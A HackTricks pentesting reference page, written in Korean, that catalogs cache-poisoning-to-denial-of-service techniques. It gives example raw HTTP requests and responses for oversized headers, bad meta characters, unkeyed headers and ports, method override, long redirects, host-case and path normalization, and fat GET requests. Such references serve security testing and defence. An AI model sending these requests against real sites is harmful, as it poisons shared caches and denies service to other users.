Cache Poisoning to DoS

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

Caution

이 νŽ˜μ΄μ§€μ—μ„œλŠ” μΊμ‹œ μ„œλ²„μ— μœ νš¨ν•œ μš”μ²­μ— λŒ€ν•΄ μ›Ή μ„œλ²„κ°€ 였λ₯˜λ‘œ μ‘λ‹΅ν•˜λ„λ‘ μ‹œλ„ν•  수 μžˆλŠ” λ‹€μ–‘ν•œ λ³€ν˜•μ„ 찾을 수 μžˆμŠ΅λ‹ˆλ‹€.

  • HTTP Header Oversize (HHO)

μ›Ή μ„œλ²„κ°€ μ§€μ›ν•˜λŠ” 것보닀 ν¬μ§€λ§Œ μΊμ‹œ μ„œλ²„κ°€ μ§€μ›ν•˜λŠ” 것보닀 μž‘μ€ 헀더 크기둜 μš”μ²­μ„ λ³΄λƒ…λ‹ˆλ‹€. μ›Ή μ„œλ²„λŠ” 400 μ‘λ‹΅μœΌλ‘œ 응닡할 것이며, μ΄λŠ” μΊμ‹œλ  수 μžˆμŠ΅λ‹ˆλ‹€:

GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000
  • HTTP 메타 문자 (HMC) 및 μ˜ˆμƒμΉ˜ λͺ»ν•œ κ°’

ν•΄λ‹Ή 곡격이 μž‘λ™ν•˜λ €λ©΄ λ¨Όμ € μΊμ‹œλ₯Ό μš°νšŒν•΄μ•Ό ν•©λ‹ˆλ‹€. ν•΄λ‘œμš΄ 메타 λ¬Έμžκ°€ ν¬ν•¨λœ 헀더λ₯Ό μ „μ†‘ν•˜μ‹­μ‹œμ˜€.

GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r

잘λͺ» κ΅¬μ„±λœ ν—€λ”λŠ” λ‹¨μˆœνžˆ \:둜 ν—€λ”λ‘œ μ‚¬μš©λ  수 μžˆμŠ΅λ‹ˆλ‹€.

μ˜ˆμƒμΉ˜ λͺ»ν•œ 값이 μ „μ†‘λ˜λ©΄, 예λ₯Ό λ“€μ–΄ μ˜ˆμƒμΉ˜ λͺ»ν•œ Content-Type:κ³Ό 같은 κ²½μš°μ—λ„ μž‘λ™ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
  • ν‚€κ°€ μ—†λŠ” 헀더

일뢀 μ›Ήμ‚¬μ΄νŠΈλŠ” μš”μ²­μ— X-Amz-Website-Location-Redirect: someThing 헀더와 같은 νŠΉμ • 헀더가 ν¬ν•¨λ˜μ–΄ 있으면 였λ₯˜ μƒνƒœ μ½”λ“œλ₯Ό λ°˜ν™˜ν•©λ‹ˆλ‹€.

GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing

HTTP/2 403 Forbidden
Cache: hit

Invalid Header
  • HTTP λ©”μ„œλ“œ μ˜€λ²„λΌμ΄λ“œ 곡격 (HMO)

μ„œλ²„κ°€ X-HTTP-Method-Override, X-HTTP-Method λ˜λŠ” X-Method-Override와 같은 ν—€λ”λ‘œ HTTP λ©”μ„œλ“œλ₯Ό λ³€κ²½ν•˜λŠ” 것을 μ§€μ›ν•˜λŠ” 경우, λ©”μ„œλ“œλ₯Ό λ³€κ²½ν•˜μ—¬ μœ νš¨ν•œ νŽ˜μ΄μ§€λ₯Ό μš”μ²­ν•  수 μžˆμŠ΅λ‹ˆλ‹€. μ΄λ ‡κ²Œ ν•˜λ©΄ μ„œλ²„κ°€ 이λ₯Ό μ§€μ›ν•˜μ§€ μ•ŠμœΌλ―€λ‘œ 잘λͺ»λœ 응닡이 μΊμ‹œλ©λ‹ˆλ‹€:

GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
  • ν‚€κ°€ μ—†λŠ” 포트

호슀트 ν—€λ”μ˜ ν¬νŠΈκ°€ 응닡에 반영되고 μΊμ‹œ 킀에 ν¬ν•¨λ˜μ§€ μ•ŠλŠ” 경우, μ‚¬μš©λ˜μ§€ μ•ŠλŠ” 포트둜 λ¦¬λ””λ ‰μ…˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

GET /index.html HTTP/1.1
Host: redacted.com:1

HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
  • Long Redirect DoS

λ‹€μŒ μ˜ˆμ™€ 같이 xκ°€ μΊμ‹œλ˜μ§€ μ•ŠκΈ° λ•Œλ¬Έμ— κ³΅κ²©μžλŠ” λ¦¬λ””λ ‰μ…˜ 응닡 λ™μž‘μ„ μ•…μš©ν•˜μ—¬ λ¦¬λ””λ ‰μ…˜μ΄ λ„ˆλ¬΄ 큰 URL을 보내도둝 λ§Œλ“€μ–΄ 였λ₯˜λ₯Ό λ°˜ν™˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€. 그런 λ‹€μŒ uncached x ν‚€ 없이 URL에 μ ‘κ·Όν•˜λ €λŠ” μ‚¬λžŒλ“€μ€ 였λ₯˜ 응닡을 λ°›κ²Œ λ©λ‹ˆλ‹€:

GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit

GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
  • 호슀트 헀더 λŒ€μ†Œλ¬Έμž μ •κ·œν™”

호슀트 ν—€λ”λŠ” λŒ€μ†Œλ¬Έμžλ₯Ό κ΅¬λΆ„ν•˜μ§€ μ•Šμ•„μ•Ό ν•˜μ§€λ§Œ 일뢀 μ›Ήμ‚¬μ΄νŠΈλŠ” μ†Œλ¬Έμžλ‘œ λ˜μ–΄ 있기λ₯Ό κΈ°λŒ€ν•˜λ©° 그렇지 μ•Šμ„ 경우 였λ₯˜λ₯Ό λ°˜ν™˜ν•©λ‹ˆλ‹€:

GET /img.png HTTP/1.1
Host: Cdn.redacted.com

HTTP/1.1 404 Not Found
Cache:miss

Not Found
  • 경둜 μ •κ·œν™”

일뢀 νŽ˜μ΄μ§€λŠ” κ²½λ‘œμ— 데이터λ₯Ό URL μΈμ½”λ”©ν•˜μ—¬ 전솑할 λ•Œ 였λ₯˜ μ½”λ“œλ₯Ό λ°˜ν™˜ν•˜μ§€λ§Œ, μΊμ‹œ μ„œλ²„λŠ” 경둜λ₯Ό URL λ””μ½”λ”©ν•˜κ³  URL λ””μ½”λ”©λœ κ²½λ‘œμ— λŒ€ν•œ 응닡을 μ €μž₯ν•©λ‹ˆλ‹€:

GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com


HTTP/1.1 404 Not Found
Cach:miss

Not Found
  • Fat Get

일뢀 μΊμ‹œ μ„œλ²„, 예λ₯Ό λ“€μ–΄ Cloudflare λ˜λŠ” μ›Ή μ„œλ²„λŠ” 본문이 μžˆλŠ” GET μš”μ²­μ„ μ€‘λ‹¨ν•˜λ―€λ‘œ, 이λ₯Ό μ•…μš©ν•˜μ—¬ 잘λͺ»λœ 응닡을 μΊμ‹œν•  수 μžˆμŠ΅λ‹ˆλ‹€:

GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3

xyz


HTTP/2 403 Forbidden
Cache: hit

μ°Έκ³ λ¬Έν—Œ

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°